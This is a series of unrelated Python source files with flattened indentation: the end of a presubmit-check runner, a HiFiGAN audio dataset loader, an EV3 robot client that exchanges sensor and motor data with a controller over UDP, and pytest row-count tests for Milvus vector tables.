change_class = GitChange
upstream = options.upstream or None
if not files:
files = scm.GIT.CaptureStatus([], options.root, upstream)
else:
logging.info('Doesn\'t seem under source control. Got %d files', len(args))
if not files:
return None, None
change_class = Change
return change_class, files
@contextlib.contextmanager
def canned_check_filter(method_names):
filtered = {}
try:
for method_name in method_names:
if not hasattr(presubmit_canned_checks, method_name):
logging.warn('Skipping unknown "canned" check %s' % method_name)
continue
filtered[method_name] = getattr(presubmit_canned_checks, method_name)
setattr(presubmit_canned_checks, method_name, lambda *_a, **_kw: [])
yield
finally:
for name, method in filtered.iteritems():
setattr(presubmit_canned_checks, name, method)
def main(argv=None):
parser = optparse.OptionParser(usage="%prog [options] <files...>",
version="%prog " + str(__version__))
parser.add_option("-c", "--commit", action="store_true", default=False,
help="Use commit instead of upload checks")
parser.add_option("-u", "--upload", action="store_false", dest='commit',
help="Use upload instead of commit checks")
parser.add_option("-r", "--recursive", action="store_true",
help="Act recursively")
parser.add_option("-v", "--verbose", action="count", default=0,
help="Use 2 times for more debug info")
parser.add_option("--name", default='no name')
parser.add_option("--author")
parser.add_option("--description", default='')
parser.add_option("--issue", type='int', default=0)
parser.add_option("--patchset", type='int', default=0)
parser.add_option("--root", default=os.getcwd(),
help="Search for PRESUBMIT.py up to this directory. "
"If inherit-review-settings-ok is present in this "
"directory, parent directories up to the root file "
"system directories will also be searched.")
parser.add_option("--upstream",
help="Git only: the base ref or upstream branch against "
"which the diff should be computed.")
parser.add_option("--default_presubmit")
parser.add_option("--may_prompt", action='store_true', default=False)
parser.add_option("--skip_canned", action='append', default=[],
help="A list of checks to skip which appear in "
"presubmit_canned_checks. Can be provided multiple times "
"to skip multiple canned checks.")
parser.add_option("--dry_run", action='store_true',
help=optparse.SUPPRESS_HELP)
parser.add_option("--gerrit_url", help=optparse.SUPPRESS_HELP)
parser.add_option("--gerrit_fetch", action='store_true',
help=optparse.SUPPRESS_HELP)
parser.add_option('--parallel', action='store_true',
help='Run all tests specified by input_api.RunTests in all '
'PRESUBMIT files in parallel.')
parser.add_option('--json_output',
help='Write presubmit errors to json output.')
options, args = parser.parse_args(argv)
if options.verbose >= 2:
logging.basicConfig(level=logging.DEBUG)
elif options.verbose:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.ERROR)
change_class, files = load_files(options, args)
if not change_class:
parser.error('For unversioned directory, <files> is not optional.')
logging.info('Found %d file(s).', len(files))
gerrit_obj = None
if options.gerrit_url and options.gerrit_fetch:
assert options.issue and options.patchset
gerrit_obj = GerritAccessor(urlparse.urlparse(options.gerrit_url).netloc)
options.author = gerrit_obj.GetChangeOwner(options.issue)
options.description = gerrit_obj.GetChangeDescription(options.issue,
options.patchset)
logging.info('Got author: "%s"', options.author)
logging.info('Got description: """\n%s\n"""', options.description)
try:
with canned_check_filter(options.skip_canned):
results = DoPresubmitChecks(
change_class(options.name,
options.description,
options.root,
files,
options.issue,
options.patchset,
options.author,
upstream=options.upstream),
options.commit,
options.verbose,
sys.stdout,
sys.stdin,
options.default_presubmit,
options.may_prompt,
gerrit_obj,
options.dry_run,
options.parallel,
options.json_output)
return not results.should_continue()
except PresubmitFailure as e:
print(e, file=sys.stderr)
print('Maybe your depot_tools is out of date?', file=sys.stderr)
return 2
if __name__ == '__main__':
fix_encoding.fix_encoding()
try:
sys.exit(main())
except KeyboardInterrupt:
sys.stderr.write('interrupted\n')
sys.exit(2)
|
HiFiGANDataset.py
|
import os
import random
from multiprocessing import Manager
from multiprocessing import Process
import librosa
import soundfile as sf
import torch
from torch.utils.data import Dataset
from tqdm import tqdm
from Preprocessing.AudioPreprocessor import AudioPreprocessor
class HiFiGANDataset(Dataset):
def __init__(self,
list_of_paths,
cache_dir,
desired_samplingrate=48000,
samples_per_segment=24576, # = 8192 * 3, as I used 8192 for 16kHz previously
loading_processes=40):
os.makedirs(cache_dir, exist_ok=True)
self.samples_per_segment = samples_per_segment
self.desired_samplingrate = desired_samplingrate
self.melspec_ap = AudioPreprocessor(input_sr=desired_samplingrate, output_sr=16000, melspec_buckets=80, hop_length=256, n_fft=1024, cut_silence=False)
# hop length of spec loss must be same as the product of the upscale factors
# samples per segment must be a multiple of hop length of spec loss
_, self._orig_sr = sf.read(list_of_paths[0])
# ^ this is the reason why we must create individual
# datasets and then concat them. If we just did all
# datasets at once, there could be multiple sampling
# rates.
resource_manager = Manager()
self.waves = resource_manager.list()
# make processes
path_splits = list()
process_list = list()
for i in range(loading_processes):
path_splits.append(list_of_paths[i * len(list_of_paths) // loading_processes:(i + 1) * len(list_of_paths) // loading_processes])
for path_split in path_splits:
process_list.append(Process(target=self.cache_builder_process, args=(path_split,), daemon=True))
process_list[-1].start()
for process in process_list:
process.join()
numpy_waves = list(self.waves)
self.waves = list()
for wave in numpy_waves:
self.waves.append(torch.Tensor(wave))
print("{} eligible audios found".format(len(self.waves)))
def cache_builder_process(self, path_split):
for path in tqdm(path_split):
with open(path, "rb") as audio_file:
wave, sr = sf.read(audio_file)
if (len(wave) / sr) > ((self.samples_per_segment + 50) / self.desired_samplingrate): # + 50 is just to be extra sure
# catch files that are too short to apply meaningful signal processing
self.waves.append(librosa.resample(y=wave, orig_sr=self._orig_sr, target_sr=self.desired_samplingrate))
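# Note (added comment): with the default settings this keeps only files longer than
# (24576 + 50) / 48000, i.e. about 0.51 s, so every cached wave can later yield a full training segment.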
def __getitem__(self, index):
"""
load the audio from the path and clean it.
All audio segments have to be cut to the same length,
according to the NeurIPS reference implementation.
return a pair of cleaned audio and corresponding spectrogram as if it was predicted by the TTS
"""
max_audio_start = len(self.waves[index]) - self.samples_per_segment
audio_start = random.randint(0, max_audio_start)
segment = self.waves[index][audio_start: audio_start + self.samples_per_segment]
resampled_segment = self.melspec_ap.resample(segment) # 16kHz spectrogram as input, 48kHz wave as output, see Blizzard 2021 DelightfulTTS
melspec = self.melspec_ap.audio_to_mel_spec_tensor(resampled_segment.float(), explicit_sampling_rate=16000, normalize=False).transpose(0, 1)[
:-1].transpose(0, 1)
return segment, melspec
def __len__(self):
return len(self.waves)
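# Usage sketch (added; not part of the original file). The paths, cache directory and
# DataLoader settings below are placeholders, not a tested configuration:
#
#   from torch.utils.data import DataLoader
#   train_set = HiFiGANDataset(list_of_paths=["/data/audio/sample_0001.wav"],
#                              cache_dir="/tmp/hifigan_cache",
#                              loading_processes=4)
#   loader = DataLoader(train_set, batch_size=16, shuffle=True, drop_last=True)
#   wave_segment, melspec = next(iter(loader))  # fixed-length waves and 80-bin mel spectrograms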
|
__init__.py
|
import struct
import datetime
import time
import socket
import argparse
import logging
import os
import traceback
import atexit
from threading import Event, Thread
import ncsbench.common.params as p
import ncsbench.common.socket as controll_socket
import ncsbench.common.packet as packet
ev3 = None
#TODO measure difference in inclination
# ----------- Sensor Methods -----------------
#gyro sensor:
#1. ev3-uart > /sys/class/lego-port/port1/mode
#2. lego-ev3-gyro > /sys/class/lego-port/port1/set_device
def send_sensor_signals(socket, addr, port,
tsr_k, tsstx_k, tasrx_k, taw_k,
seq_number, gyro_rate, motor_pos_left, motor_pos_right, gyro_offset,
motorVoltageApplied_left, motorVoltageApplied_right):
""" Packs all sensory information into predefined packet format and sends over UDP connection
:param socket: UDP socket used to send packets
:param timestamp: Clock-time of the current packet
:param seq_number: Sequence number of the current number
:param gyro_rate: Gyro sensor measurement
:param motor_pos_left: Left motor position
:param motor_pos_right: Right motor position
:return: None
"""
logging.debug("Sending tsrk: %f tsstx_k: %f tasrx_k: %f taw_k: %f",
tsr_k, tsstx_k, tasrx_k, taw_k)
stuff = struct.pack(packet.R2H_PACKET_FORMAT, seq_number,
packet.time2int(tsr_k), packet.time2int(
tsstx_k), packet.time2int(tasrx_k), packet.time2int(taw_k),
packet.sensor2int(gyro_rate), packet.sensor2int(
motor_pos_left), packet.sensor2int(motor_pos_right),
packet.sensor2int(gyro_offset), packet.sensor2int(motorVoltageApplied_left), packet.sensor2int(motorVoltageApplied_right))
socket.sendto(stuff, (addr, port))
# For reading from the sensor files
def SensorRead(infile):
infile.seek(0)
return float(infile.read().decode().strip())
def calibrate_gyro(gyroSensorValueRaw):
gyroOffset = 0.0
gyroRateCalibrateCount = 200
for i in range(gyroRateCalibrateCount):
gyro = SensorRead(gyroSensorValueRaw)
logging.debug("S: Gyro reading %d: %f", i, gyro)
gyroOffset = gyroOffset + gyro
time.sleep(0.01)
gyroOffset = gyroOffset / gyroRateCalibrateCount
return gyroOffset
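# Note (added comment): the calibration above averages 200 raw gyro readings taken
# 10 ms apart, so it blocks for roughly 2 seconds; the robot has to stay still
# (laid down) during this time for the offset to be meaningful.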
def init_sensors():
""" Instantiates and calibrates both gyro sensor and motors
:return: Gyro and EV3Motors instances
"""
# Create EV3 resource objects
gyroSensor = ev3.GyroSensor(ev3.sensors[argv.gyro_port])
time.sleep(0.1)#work around for https://github.com/ev3dev/ev3dev-lang-python/issues/234
gyroSensor.mode = gyroSensor.MODE_GYRO_RATE
touch1=ev3.TouchSensor(ev3.sensors[argv.touch_1_port])
touch2=ev3.TouchSensor(ev3.sensors[argv.touch_2_port])
motorLeft = ev3.LargeMotor(ev3.motors[argv.motor_l_port])
motorRight = ev3.LargeMotor(ev3.motors[argv.motor_r_port])
# Open sensor and motor files
gyroSensorValueRaw = open(gyroSensor._path + "/value0", "rb")
# Reset the motors
motorLeft.reset()
motorRight.reset()
motorLeft.run_direct()
motorRight.run_direct()
motorEncoderLeft = open(motorLeft._path + "/position", "rb")
motorEncoderRight = open(motorRight._path + "/position", "rb")
return gyroSensorValueRaw, motorEncoderLeft, motorEncoderRight,touch1,touch2
# ----------- Actuator Methods -----------------
# For writing to motor files
def MotorWrite(outfile, value):
outfile.truncate(0)
outfile.write(str(int(value)))
outfile.flush()
# Function to set the duty cycle of the motors
def SetDuty(motorDutyFileHandle, voltage):
# Voltage to PWM and cast to int
duty = int(round(voltage*100/8.087))
# Clamp the value between -100 and 100
if duty > 0:
duty = min(100, duty)
elif duty < 0:
duty = max(-100, duty)
# Apply the signal to the motor
MotorWrite(motorDutyFileHandle, duty)
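# Worked example (added comment): a request of 4.0 V maps to
# int(round(4.0 * 100 / 8.087)) == 49 % duty cycle, while 9.0 V would give 111
# and is clamped to 100 by the code above.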
def init_actuators():
""" Instantiates and calibrates both gyro sensor and motors
:return: Gyro and EV3Motors instances
"""
motorLeft = ev3.LargeMotor(ev3.motors[argv.motor_l_port])
motorRight = ev3.LargeMotor(ev3.motors[argv.motor_r_port])
# Reset the motors
motorLeft.reset()
motorRight.reset()
motorLeft.run_direct()
motorRight.run_direct()
motorDutyCycleFile_left = open(motorLeft._path + "/duty_cycle_sp", "w")
motorDutyCycleFile_right = open(motorRight._path + "/duty_cycle_sp", "w")
return motorDutyCycleFile_left, motorDutyCycleFile_right
# ----------- Main Loop -----------------
def main(ts, c_addr, s_port, a_port, c_port, log_enabled,c_sock,runtime):
""" Main function called from __main__
:param ts: Sampling period in milliseconds
:param c_addr: IP address of the controller
:param s_port: Port number to send sensor signals
:param a_port: Port number to receive actuation signals
:param log_enabled: Set to 'True' to activate logging sensor measurements & states into logfile
:param args: args object parsed from commandline and settings file
:return: None
"""
start_time=None
buttons = ev3.Button()
#leds = ev3.Leds()
#leds.set_color(leds.LEFT, leds.RED)
#leds.set_color(leds.RIGHT, leds.RED)
logging.info(
"Lay down the robot.Waiting for ROBOT_CALLIB")
# Initialization of the sensors
gyroSensorValueRaw, \
motorEncoderLeft, motorEncoderRight ,\
touch1,touch2= init_sensors()
logging.debug("Initialized sensors")
# Initialization of the actuators
motorDutyCycleFile_left, motorDutyCycleFile_right = init_actuators()
logging.debug("Initialized actuators")
def stop_fun(data, addr, sock):
global finished
finished=True
c_sock.event[controll_socket.EVENTS.ROBOT_STOP].always.add(stop_fun)
# wait for controller to respond
c_sock.send(controll_socket.EVENTS.READY)
c_sock.event[controll_socket.EVENTS.ROBOT_CALLIB].wait()
# Calibration
gyroOffset = calibrate_gyro(gyroSensorValueRaw)
logging.info("Calibration done.")
ev3.Sound.beep().wait()
#leds.set_color(leds.LEFT, leds.AMBER)
#leds.set_color(leds.RIGHT, leds.AMBER)
def wait_for(f,t,*args):
time.sleep(t)
f(*args)
th = Thread(target=lambda: wait_for(stop_fun, runtime, None, None, None), daemon=True)
th.start()  # stop the control loop automatically once the configured runtime has elapsed
c_sock.send(controll_socket.EVENTS.ROBOT_START)
# Initialization of the sensor sockets
udp_socket_sensor = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket_sensor.setblocking(0)
udp_socket_sensor.bind(('', s_port))
logging.debug("Initialized sensor UDP socket")
# Initialization of the actuator socket
udp_socket_actuator = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket_actuator.setblocking(1)
udp_socket_actuator.settimeout(0.001)
udp_socket_actuator.bind(('', a_port))
logging.debug("Initialized actuator UDP socket")
c_sock.send(controll_socket.EVENTS.ROBOT_START)
# Inits:
next_trigger_time = 0 # the robot "starts" the loop by sending the first message
k = 0
# Aux variables
first_packet = True
buttons = ev3.Button()
seq_no_applied = 0
motor_voltage_applied_left = 0
motor_voltage_applied_right = 0
prediction_count = 0
receptionStarted = False
no_of_sim_steps = 10
voltagePredictions = [0]*2*no_of_sim_steps
tau_RTT = 0
avg_diff = p.SAMPLING_TIME
diff_variance = 0
old_sens_timestamp = time.perf_counter()
tsr_k = time.perf_counter()
tsstx_k = time.perf_counter()
tasrx_k = 0
taw_k = 0
# Robot logging
timenow = datetime.datetime.now()
if log_enabled:
filename = "datalog" + str(timenow.year)+"-" + str(timenow.month)+"-"+str(timenow.day)+"_" + str(
timenow.hour) + "_"+str(timenow.minute) + "_"+str(timenow.second) + ".csv"
f = open(filename, "w")
f.write("gyro,enc_l,enc_r, rtt, prediction_count\n")
outdated_warning_printed = False
while True:
next_trigger_time = time.perf_counter() + ts
k += 1
# Sensor readings
tsr_km1 = tsr_k
tsr_k = time.perf_counter()
gyro = SensorRead(gyroSensorValueRaw)
new_sens_timestamp = time.perf_counter()
enc_l = SensorRead(motorEncoderLeft)
enc_r = SensorRead(motorEncoderRight)
diff_sens_timestamp = new_sens_timestamp - old_sens_timestamp
old_sens_timestamp = new_sens_timestamp
avg_diff = ((k-1) / k) * avg_diff + 1/k * diff_sens_timestamp
diff_variance = ((k - 1) / k) * diff_variance + (1/k) * \
(diff_sens_timestamp - avg_diff) * (diff_sens_timestamp - avg_diff)
# Sensor transmission
try:
tsstx_km1 = tsstx_k
# transmission of a time reply for the controller #TODO in the send_sensor_signal?
tsstx_k = time.perf_counter()
send_sensor_signals(udp_socket_sensor, c_addr, s_port,
tsr_km1, tsstx_km1, tasrx_k, taw_k,
k, gyro, enc_l, enc_r, gyroOffset, motor_voltage_applied_left,
motor_voltage_applied_right)
if receptionStarted:
logging.debug(
"Sensing %d sent at %f with actuation %f", k, tsstx_k, tasrx_k)
# logging.debug("Sensing %d sent at %f" % (k, t0_req_tx_current))
except KeyboardInterrupt:
udp_socket_sensor.close()
return
except socket.error:
return
# Take timestamp after packet was sent
timestamp = time.perf_counter()
# Actuation reception - Use the rest of the time to receive host packets, trying at least once.
while True:
rx_packet = None
try:
while True:
rx_bytes = udp_socket_actuator.recv(packet.H2R_PACKET_SIZE)
rx_packet = rx_bytes[:]
except socket.timeout:
if rx_packet is not None:
if first_packet:
logging.info("Control loop started.")
#leds.set_color(leds.LEFT, leds.GREEN)
#leds.set_color(leds.RIGHT, leds.GREEN)
first_packet = False
start_time=time.perf_counter()
tasrx_k = time.perf_counter() # reception of the time request from the controller
logging.debug("Actuation %d received at %f" % (k, tasrx_k))
receptionStarted = True
data_from_host = struct.unpack(
packet.H2R_PACKET_FORMAT, rx_packet)
seq_no_received = data_from_host[packet.H2R_PACKET_VARS.Seq_number]
# If the received packet is newer than the one last applied:
if seq_no_received == k:
# Measure round trip time and get appropriate index
tau_RTT = time.perf_counter() - timestamp
# Get voltages
# Current:
voltage_left = float(data_from_host[2])/1000000
voltage_right = float(data_from_host[3])/1000000
# Predictions:
for i in range(no_of_sim_steps):
voltagePredictions[2 *
i] = float(data_from_host[2*i+2])/1000000
voltagePredictions[2*i +
1] = float(data_from_host[2*i+3])/1000000
# Reset prediction counter
prediction_count = 0
motor_voltage_applied_left = voltage_left
motor_voltage_applied_right = voltage_right
time_last_applied = time.perf_counter()
seq_no_applied = seq_no_received
while time.perf_counter() <= next_trigger_time-0.003:
pass
if log_enabled:
f.write("%f,%f,%f,%f,%f\n" % (gyro, enc_l,
enc_r, tau_RTT, prediction_count))
SetDuty(motorDutyCycleFile_left, voltage_left)
SetDuty(motorDutyCycleFile_right, voltage_right)
taw_k = time.perf_counter()
break
else:
pass
# logging.debug('Actuator: Not received %d at %f' % (k, time.perf_counter()))
except KeyboardInterrupt:
udp_socket_actuator.close()
logging.debug("Keyboard interrupt, exiting")
return
except socket.error:
logging.debug("Socket error, exiting")
traceback.print_exc()
return
# Killswitch: if up button pressed, turn off motors and exit
if buttons.up:
SetDuty(motorDutyCycleFile_left, 0)
SetDuty(motorDutyCycleFile_right, 0)
logging.debug("avg_diff: %f, var_diff: %f, sampling_time: %f",
avg_diff, diff_variance, p.SAMPLING_TIME)
logging.info("Control loop stopped.")
#leds.set_color(leds.LEFT, leds.RED)
#leds.set_color(leds.RIGHT, leds.RED)
if log_enabled:
f.close()
exit(0)
if finished:
logging.info("Control loop finished.")
#leds.set_color(leds.LEFT, leds.RED)
#leds.set_color(leds.RIGHT, leds.RED)
if log_enabled:
f.close()
message=bytearray(struct.pack("!d",-1.0))
if log_enabled:
message.extend(open(filename,"rb").read())
os.remove(filename)
c_sock.send(controll_socket.EVENTS.ROBOT_STOP,message)
c_sock.unregister_shutdown()
exit(0)
if touch1.is_pressed or touch2.is_pressed:
stop_time=time.perf_counter()
SetDuty(motorDutyCycleFile_left, 0)
SetDuty(motorDutyCycleFile_right, 0)
logging.info("Control loop stopped.")
#leds.set_color(leds.LEFT, leds.RED)
#leds.set_color(leds.RIGHT, leds.RED)
if log_enabled:
f.close()
elapsed = stop_time - start_time  # avoid shadowing the time module
message = bytearray(struct.pack("!d", elapsed))
if log_enabled:
message.extend(open(filename,"rb").read())
os.remove(filename)
c_sock.send(controll_socket.EVENTS.ROBOT_STOP,message)
c_sock.unregister_shutdown()
exit(0)
# If time's up, break reception loop
if time.perf_counter() >= (next_trigger_time-0.006):
if receptionStarted:
if prediction_count < 10:
tasrx_k = time.perf_counter() # theoretical reception timestamp
if prediction_count > 0:
logging.debug("Prediction step %d, %d",
prediction_count, k)
voltage_left = voltagePredictions[2*prediction_count]
voltage_right = voltagePredictions[2 *
prediction_count+1]
SetDuty(motorDutyCycleFile_left, voltage_left)
SetDuty(motorDutyCycleFile_right, voltage_right)
taw_k = time.perf_counter() # theoretical application timestamp
motor_voltage_applied_left = voltage_left
motor_voltage_applied_right = voltage_right
prediction_count += 1
seq_no_applied += 1
outdated_warning_printed = False
else:
if outdated_warning_printed == False:
logging.debug(
"Warning: No more simulation steps available!")
outdated_warning_printed = True
else:
pass
# Robot logging
if log_enabled:
f.write("%f,%f,%f,%f,%f\n" %
(gyro, enc_l, enc_r, tau_RTT, prediction_count-1))
break
finished=False
argv=None
def run(args):
global ev3,argv
argv=args
ev3 = args.lib
logger = logging.getLogger()
if args.verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
logging.debug("IP address of the controller: %s", args.address)
# Renice the process for better timing performance (needs sudo!)
try:
os.nice(-11)
except PermissionError:
pass
def at_exit():
motorDutyCycleFile_left, motorDutyCycleFile_right = init_actuators()
SetDuty(motorDutyCycleFile_left, 0)
SetDuty(motorDutyCycleFile_right, 0)
atexit.register(at_exit)
main(p.SAMPLING_TIME, args.address, args.sport, args.aport, args.cport, args.logging,args.sock,args.runtime)
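# Illustrative only (added): run() expects an argparse-style namespace whose attribute
# names are inferred from their uses above; the values below are placeholders, not a
# tested configuration, and control_socket stands in for the ncsbench control socket:
#
#   import argparse
#   import ev3dev.ev3 as ev3lib
#   args = argparse.Namespace(lib=ev3lib, verbose=True, address="192.168.0.10",
#                             sport=5001, aport=5002, cport=5003, logging=True,
#                             sock=control_socket, runtime=60.0,
#                             gyro_port=0, touch_1_port=1, touch_2_port=2,
#                             motor_l_port=0, motor_r_port=1)
#   run(args)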
|
test_table_count.py
|
import random
import pdb
import pytest
import logging
import itertools
import time
from time import sleep
from multiprocessing import Process
from milvus import IndexType, MetricType
from utils import *
dim = 128
index_file_size = 10
add_time_interval = 3
tag = "1970-01-01"
class TestTableCount:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_simple_index_params(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
def test_table_rows_count(self, connect, table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(table)
assert res == nb
def test_table_rows_count_partition(self, connect, table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table, create partition and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
partition_name = gen_unique_str()
vectors = gen_vectors(nb, dim)
status = connect.create_partition(table, partition_name, tag)
assert status.OK()
res = connect.add_vectors(table_name=table, records=vectors, partition_tag=tag)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(table)
assert res == nb
def test_table_rows_count_multi_partitions_A(self, connect, table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table, create partitions and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
new_tag = "new_tag"
nb = add_vectors_nb
partition_name = gen_unique_str()
new_partition_name = gen_unique_str()
vectors = gen_vectors(nb, dim)
status = connect.create_partition(table, partition_name, tag)
status = connect.create_partition(table, new_partition_name, new_tag)
assert status.OK()
res = connect.add_vectors(table_name=table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(table)
assert res == nb
def test_table_rows_count_multi_partitions_B(self, connect, table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table, create partitions and add vectors in one of the partitions,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
new_tag = "new_tag"
nb = add_vectors_nb
partition_name = gen_unique_str()
new_partition_name = gen_unique_str()
vectors = gen_vectors(nb, dim)
status = connect.create_partition(table, partition_name, tag)
status = connect.create_partition(table, new_partition_name, new_tag)
assert status.OK()
res = connect.add_vectors(table_name=table, records=vectors, partition_tag=tag)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(partition_name)
assert res == nb
status, res = connect.get_table_row_count(new_partition_name)
assert res == 0
def test_table_rows_count_multi_partitions_C(self, connect, table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table, create partitions and add vectors in one of the partitions,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the table count is equal to the length of vectors
'''
new_tag = "new_tag"
nb = add_vectors_nb
partition_name = gen_unique_str()
new_partition_name = gen_unique_str()
vectors = gen_vectors(nb, dim)
status = connect.create_partition(table, partition_name, tag)
status = connect.create_partition(table, new_partition_name, new_tag)
assert status.OK()
res = connect.add_vectors(table_name=table, records=vectors, partition_tag=tag)
res = connect.add_vectors(table_name=table, records=vectors, partition_tag=new_tag)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(partition_name)
assert res == nb
status, res = connect.get_table_row_count(new_partition_name)
assert res == nb
status, res = connect.get_table_row_count(table)
assert res == nb * 2
def test_table_rows_count_after_index_created(self, connect, table, get_simple_index_params):
'''
target: test get_table_row_count, after index have been created
method: add vectors in db, and create index, then calling get_table_row_count with correct params
expected: the count is equal to the length of vectors
'''
nb = 100
index_params = get_simple_index_params
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=table, records=vectors)
time.sleep(add_time_interval)
# logging.getLogger().info(index_params)
connect.create_index(table, index_params)
status, res = connect.get_table_row_count(table)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, table, dis_connect):
'''
target: test get_table_row_count, without connection
method: calling get_table_row_count with correct params, with a disconnected instance
expected: get_table_row_count raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.get_table_row_count(table)
def test_table_rows_count_no_vectors(self, connect, table):
'''
target: test table rows_count is correct or not, if table is empty
method: create table and no vectors in it,
assert the value returned by get_table_row_count method is equal to 0
expected: the count is equal to 0
'''
table_name = gen_unique_str()
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_table(param)
status, res = connect.get_table_row_count(table)
assert res == 0
# TODO: enable
@pytest.mark.level(2)
@pytest.mark.timeout(20)
def _test_table_rows_count_multiprocessing(self, connect, table, args):
'''
target: test table rows_count is correct or not with multiprocess
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 2
uri = "tcp://%s:%s" % (args["ip"], args["port"])
vectors = gen_vectors(nq, dim)
res = connect.add_vectors(table_name=table, records=vectors)
time.sleep(add_time_interval)
def rows_count(milvus):
status, res = milvus.get_table_row_count(table)
logging.getLogger().info(status)
assert res == nq
process_num = 8
processes = []
for i in range(process_num):
milvus = get_milvus()
milvus.connect(uri=uri)
p = Process(target=rows_count, args=(milvus, ))
processes.append(p)
p.start()
logging.getLogger().info(p)
for p in processes:
p.join()
def test_table_rows_count_multi_tables(self, connect):
'''
target: test table rows_count is correct or not with multiple tables of L2
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
vectors = gen_vectors(nq, dim)
table_list = []
for i in range(20):
table_name = gen_unique_str()
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_table(param)
res = connect.add_vectors(table_name=table_name, records=vectors)
time.sleep(2)
for i in range(20):
status, res = connect.get_table_row_count(table_list[i])
assert status.OK()
assert res == nq
class TestTableCountIP:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_simple_index_params(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in open source")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
def test_table_rows_count(self, connect, ip_table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=ip_table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(ip_table)
assert res == nb
def test_table_rows_count_after_index_created(self, connect, ip_table, get_simple_index_params):
'''
target: test get_table_row_count, after index have been created
method: add vectors in db, and create index, then calling get_table_row_count with correct params
expected: the count is equal to the length of vectors
'''
nb = 100
index_params = get_simple_index_params
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=ip_table, records=vectors)
time.sleep(add_time_interval)
# logging.getLogger().info(index_params)
connect.create_index(ip_table, index_params)
status, res = connect.get_table_row_count(ip_table)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, ip_table, dis_connect):
'''
target: test get_table_row_count, without connection
method: calling get_table_row_count with correct params, with a disconnected instance
expected: get_table_row_count raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.get_table_row_count(ip_table)
def test_table_rows_count_no_vectors(self, connect, ip_table):
'''
target: test table rows_count is correct or not, if table is empty
method: create table and no vectors in it,
assert the value returned by get_table_row_count method is equal to 0
expected: the count is equal to 0
'''
table_name = gen_unique_str("test_table")
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_table(param)
status, res = connect.get_table_row_count(ip_table)
assert res == 0
# TODO: enable
@pytest.mark.timeout(60)
def _test_table_rows_count_multiprocessing(self, connect, ip_table, args):
'''
target: test table rows_count is correct or not with multiprocess
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 2
uri = "tcp://%s:%s" % (args["ip"], args["port"])
vectors = gen_vectors(nq, dim)
res = connect.add_vectors(table_name=ip_table, records=vectors)
time.sleep(add_time_interval)
def rows_count(milvus):
status, res = milvus.get_table_row_count(ip_table)
logging.getLogger().info(status)
assert res == nq
process_num = 8
processes = []
for i in range(process_num):
milvus = get_milvus()
milvus.connect(uri=uri)
p = Process(target=rows_count, args=(milvus,))
processes.append(p)
p.start()
logging.getLogger().info(p)
for p in processes:
p.join()
def test_table_rows_count_multi_tables(self, connect):
'''
target: test table rows_count is correct or not with multiple tables of IP
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
vectors = gen_vectors(nq, dim)
table_list = []
for i in range(20):
table_name = gen_unique_str('test_table_rows_count_multi_tables')
table_list.append(table_name)
param = {'table_name': table_name,
